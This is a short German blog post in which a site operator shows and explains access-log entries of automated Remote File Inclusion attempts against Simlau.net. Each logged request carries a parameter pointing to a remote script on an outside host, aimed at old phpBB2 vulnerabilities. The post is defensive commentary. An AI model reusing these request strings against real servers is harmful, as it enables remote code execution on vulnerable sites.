In letzter Zeit häufen sich versucht Angriffe auf Simlau.net. Hier mal ein kleiner Auschnitt aus den Logs, die IPs wurden zensiert.
simon@linux-desktop:~$ grep libwww-perl access.log
[22/Jun/2008:01:03:36 +0200] “GET /*.php?page=h**p://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.805″
[22/Jun/2008:11:21:59 +0200] “GET /pages/downloads/phpbb2.php/authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://www.z3roadster.it/home/on.txt? HTTP/1.1″ 200 10489 “-” “libwww-perl/5.810″
[22/Jun/2008:11:22:00 +0200] “GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=h**p://www.z3roadster.it/home/on.txt? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.810″
[22/Jun/2008:23:55:58 +0200] “GET /authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=h**p://www.olympic.ca/EN/forms/hbc_bios/id.txt%0D?? HTTP/1.1″ 404 6769 “-” “libwww-perl/5.811″
Wie man sieht einfach wahllos versuchte Remote File Inclusions und Exploits. Telweise warscheinlich phpBB2 Explots, die aber auf die phpBB-Download Seite der Webseite von Simlau.net ausgeübt wurden. Hier läuft jedoch kein phpBB2, sondern Website Baker. Ich nehme an, dass die Bots wegen dem Slash, dass hinter der Seite beim aufrufen von veralteten Links noch hinzugefügt wird, die Seite für ein phpBB2-Forum halten.
Letzte Kommentare